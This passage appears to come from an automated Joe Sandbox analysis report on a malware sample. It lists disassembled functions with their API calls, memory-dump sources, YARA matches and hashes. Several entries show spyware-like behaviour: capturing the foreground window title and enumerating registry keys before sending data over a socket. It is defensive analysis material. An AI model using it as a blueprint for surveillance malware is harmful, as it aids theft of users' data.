                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                • Opcode ID: 9e981b61d3fa23a2f85307624ffb8223cdd74446a695ec16283e25e9723ff1f2
                                                                                                                                                                • Instruction ID: bb70740fd5523eda7addc03bf4ac5e1b16dcf3ac1b140d3915e667eaad2fa188
                                                                                                                                                                • Opcode Fuzzy Hash: 9e981b61d3fa23a2f85307624ffb8223cdd74446a695ec16283e25e9723ff1f2
                                                                                                                                                                • Instruction Fuzzy Hash: 8B21B071A88705AFCB209F69CC8491BBFA9EF02768720852CE815DB290D730FD9087B0
                                                                                                                                                                Function 6FE9C319 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6FE9C321
                                                                                                                                                                  • Part of subcall function 6FE9C276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FEA11FF,?,00000000,-00000008), ref: 6FE9C2D7
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE9C359
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE9C379
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                • Opcode ID: 2114f8cd0ab9e9efe2c70d711bab538af4060cc46875b1f9f04d6ff015f097c1
                                                                                                                                                                • Instruction ID: 761f4018e7713c0b6b4e9aeacc2284c2709e273e097fae1b398bbfb9ad36258b
                                                                                                                                                                • Opcode Fuzzy Hash: 2114f8cd0ab9e9efe2c70d711bab538af4060cc46875b1f9f04d6ff015f097c1
                                                                                                                                                                • Instruction Fuzzy Hash: 4E11C8B2605A167EA72167BD8CCCCAF2D6DDF8729C760016DF901D1240FB24DE514271
                                                                                                                                                                Function 0006A0C6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007A7C0: GetForegroundWindow.USER32(76F90F00,?), ref: 0007A7D0
                                                                                                                                                                  • Part of subcall function 0007A7C0: GetWindowTextLengthW.USER32(00000000), ref: 0007A7D9
                                                                                                                                                                  • Part of subcall function 0007A7C0: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0007A803
                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 0006A113
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0006A19C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                • String ID: [ $ ]
                                                                                                                                                                • API String ID: 3309952895-93608704
                                                                                                                                                                • Opcode ID: b2790aef19af5318a4e8e023e0b758c1979fa71da6f5606fe6ae692c914ca2ac
                                                                                                                                                                • Instruction ID: d5e375abf683a9a53e1d146eb35adc83c68505baeed285ca6d473ae6b4b4d601
                                                                                                                                                                • Opcode Fuzzy Hash: b2790aef19af5318a4e8e023e0b758c1979fa71da6f5606fe6ae692c914ca2ac
                                                                                                                                                                • Instruction Fuzzy Hash: 8711CD316042005BD618F764DC139EFB3AAAF82310F90052DF99227193EE65AE098AD3
                                                                                                                                                                Function 000A04E5 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9495fa8793fbfea44a21c297e6d54179153ac60736f7f1f570da0e5f685701b0
                                                                                                                                                                • Instruction ID: 49b2b1d1221fc9626da8873d2da0017400b7838a9f29bee430b316771785c672
                                                                                                                                                                • Opcode Fuzzy Hash: 9495fa8793fbfea44a21c297e6d54179153ac60736f7f1f570da0e5f685701b0
                                                                                                                                                                • Instruction Fuzzy Hash: 4301F2B260560A3EF66016F86CC0FAB638DEF537B8B300325F620611D2DB359D108520
                                                                                                                                                                Function 000A0564 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bc21e8ad858329a0cd7f0cd73341d970f392b2e86f8b2f45ab84f976a709a250
                                                                                                                                                                • Instruction ID: 494716e043255806688feca0df13b5126884af28580258510e7aab230991e8a5
                                                                                                                                                                • Opcode Fuzzy Hash: bc21e8ad858329a0cd7f0cd73341d970f392b2e86f8b2f45ab84f976a709a250
                                                                                                                                                                • Instruction Fuzzy Hash: B401D6B2A09A1A7EFA6056F86CC1DAB629DEF533B43200725F431611D1DF348D004960
                                                                                                                                                                Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                Function 02585579 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 02585590
                                                                                                                                                                  • Part of subcall function 02585BC8: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 02585BF7
                                                                                                                                                                  • Part of subcall function 02585BC8: ___AdjustPointer.LIBCMT ref: 02585C12
                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 025855A7
                                                                                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 025855B9
                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 025855DD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2901542994-0
                                                                                                                                                                • Opcode ID: f84ef832e447a592ef24d677404c7af905c0307425b84c490414221a8babb987
                                                                                                                                                                • Instruction ID: 648d9f53a9bbff7f0025b7f660ecc6261b4b5a83065083e3b33939728007bbe4
                                                                                                                                                                • Opcode Fuzzy Hash: f84ef832e447a592ef24d677404c7af905c0307425b84c490414221a8babb987
                                                                                                                                                                • Instruction Fuzzy Hash: 3F01D73210010ABBCF126F55CC04EDA3BAAFF89754F464015FD5875120E7B6E961DFA8
                                                                                                                                                                Function 0255CB17 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0255CB22
                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0255CB61
                                                                                                                                                                  • Part of subcall function 02582A4E: _Yarn.LIBCPMT ref: 02582A6D
                                                                                                                                                                  • Part of subcall function 02582A4E: _Yarn.LIBCPMT ref: 02582A91
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0255CB79
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0255CB87
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3706160523-0
                                                                                                                                                                • Opcode ID: 1f31a8b8d346c18b50bd8abe20a023f562143631265110a9c75836a6c7f8f805
                                                                                                                                                                • Instruction ID: cbf8ca48a30a5a8046af058dc7573a6e0df5278f371370a973694f4f841634f9
                                                                                                                                                                • Opcode Fuzzy Hash: 1f31a8b8d346c18b50bd8abe20a023f562143631265110a9c75836a6c7f8f805
                                                                                                                                                                • Instruction Fuzzy Hash: 4FF044314006355AC724FB60DD72EEBB7AABF50310F50452BDD16524A0EF70A719CE99
                                                                                                                                                                Function 6FEA21E3 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000), ref: 6FEA21FA
                                                                                                                                                                • GetLastError.KERNEL32(?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000,?,?,?,6FE9D599,00000000), ref: 6FEA2206
                                                                                                                                                                  • Part of subcall function 6FEA21CC: CloseHandle.KERNEL32(FFFFFFFE,6FEA2216,?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000,?,?), ref: 6FEA21DC
                                                                                                                                                                • ___initconout.LIBCMT ref: 6FEA2216
                                                                                                                                                                  • Part of subcall function 6FEA218E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6FEA21BD,6FEA1681,?,?,6FE9CFF6,?,00000000,00000000,?), ref: 6FEA21A1
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000,?), ref: 6FEA222B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                • Opcode ID: 92e38b0edc094175b41b229c98fa8918ca8c2f320df2c8ae77ba43d5eb5e61e6
                                                                                                                                                                • Instruction ID: 23ae7f23fdd0429b08737285db8b79cb2a766de4ca365509af6fa4909681b435
                                                                                                                                                                • Opcode Fuzzy Hash: 92e38b0edc094175b41b229c98fa8918ca8c2f320df2c8ae77ba43d5eb5e61e6
                                                                                                                                                                • Instruction Fuzzy Hash: 75F01C36501519BFCF221F96CC08D8D3F26EF6B3B0F108011FA59A9160C6338931AB90
                                                                                                                                                                Function 025844F9 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 025844F9
                                                                                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 025844FE
                                                                                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02584503
                                                                                                                                                                  • Part of subcall function 02587906: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02587917
                                                                                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02584518
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1761009282-0
                                                                                                                                                                • Opcode ID: 7906419e4e19aa502c4cabf51773dc653973267a952af4ddcc376120d28afdb1
                                                                                                                                                                • Instruction ID: 4ce3d44ad049a62ec73b9de08314d747631ed1200b3056c2cafd0daedaa5a57b
                                                                                                                                                                • Opcode Fuzzy Hash: 7906419e4e19aa502c4cabf51773dc653973267a952af4ddcc376120d28afdb1
                                                                                                                                                                • Instruction Fuzzy Hash: 65C0486D001203102C513AB0A2102BE9B837CEF3A9BA028D08C613B416DBC6090AAC3F
                                                                                                                                                                Function 02588B63 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                • String ID: +$-
                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                • Opcode ID: a548e79ce91f390c3c893aa0bb96c99cd3d26ba147e2271bce1aa4bbb92c8a1d
                                                                                                                                                                • Instruction ID: 0500306c2f824f175f03f3b9f657830c80a99675f63505bf7bc2281e772ac659
                                                                                                                                                                • Opcode Fuzzy Hash: a548e79ce91f390c3c893aa0bb96c99cd3d26ba147e2271bce1aa4bbb92c8a1d
                                                                                                                                                                • Instruction Fuzzy Hash: B291E87190214D9FCF20EE68C8586EDBFB1FF51324F94865AD861BB284E3B09505CB59
                                                                                                                                                                Function 6FE7A360 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 238COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • Box<dyn Any><unnamed>, xrefs: 6FE7A432
                                                                                                                                                                • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 6FE7A6D9, 6FE7A713, 6FE7A732
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                                                                                                                                                • API String ID: 0-3513654867
                                                                                                                                                                • Opcode ID: 167ad13d03a5737b59b2afbdad0c4f6923448905167ae97041ba324dac24c8fd
                                                                                                                                                                • Instruction ID: 5df3172220b0bd378201fbc23cf174661ca5f57db7a9dcc37398f9a77f9d30d0
                                                                                                                                                                • Opcode Fuzzy Hash: 167ad13d03a5737b59b2afbdad0c4f6923448905167ae97041ba324dac24c8fd
                                                                                                                                                                • Instruction Fuzzy Hash: 86A14A71540B008FE731DF65C480757BFE4AF05B08F60896ED5AA8BAA1EB36F405CB91
                                                                                                                                                                Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 1000655C
                                                                                                                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                                                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                Function 00072069 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0007209E
                                                                                                                                                                  • Part of subcall function 00071DB1: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00071E18
                                                                                                                                                                  • Part of subcall function 00071DB1: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00071E47
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,000C2774,000C2774,000C8878,000C8878,00000071), ref: 000721F2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                • String ID: P%
                                                                                                                                                                • API String ID: 3114080316-96427000
                                                                                                                                                                • Opcode ID: 4e17ecb0c2b58ad7ad0e9bedb5dc29c3427c6f94bd9b9b1d3fc033bbe0a2f26c
                                                                                                                                                                • Instruction ID: 365a13ce397a73638c43b961cb549bef54fd48e3480392943d0ca0a0c24690a7
                                                                                                                                                                • Opcode Fuzzy Hash: 4e17ecb0c2b58ad7ad0e9bedb5dc29c3427c6f94bd9b9b1d3fc033bbe0a2f26c
                                                                                                                                                                • Instruction Fuzzy Hash: D341E231A085045BDB18FB64DC92BEE737BAF60300F40417AF40AA7293EE245E49C7A5
                                                                                                                                                                Function 00066079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: <
                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                • Opcode ID: dca042d3f64572ee77d2262de8b12c0bd699c6ec0020eb4a485bddb1993d266a
                                                                                                                                                                • Instruction ID: 0ef46447a923042f57d8c3e3cda744c62a522e5417220b2b0218d206c11e04a0
                                                                                                                                                                • Opcode Fuzzy Hash: dca042d3f64572ee77d2262de8b12c0bd699c6ec0020eb4a485bddb1993d266a
                                                                                                                                                                • Instruction Fuzzy Hash: 1141A231A04508ABEB14EBE0DC92FEEB3BAAF40710F20405AF541A7193EF756E44CB51
                                                                                                                                                                Function 6FE9483B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 6FE94860
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
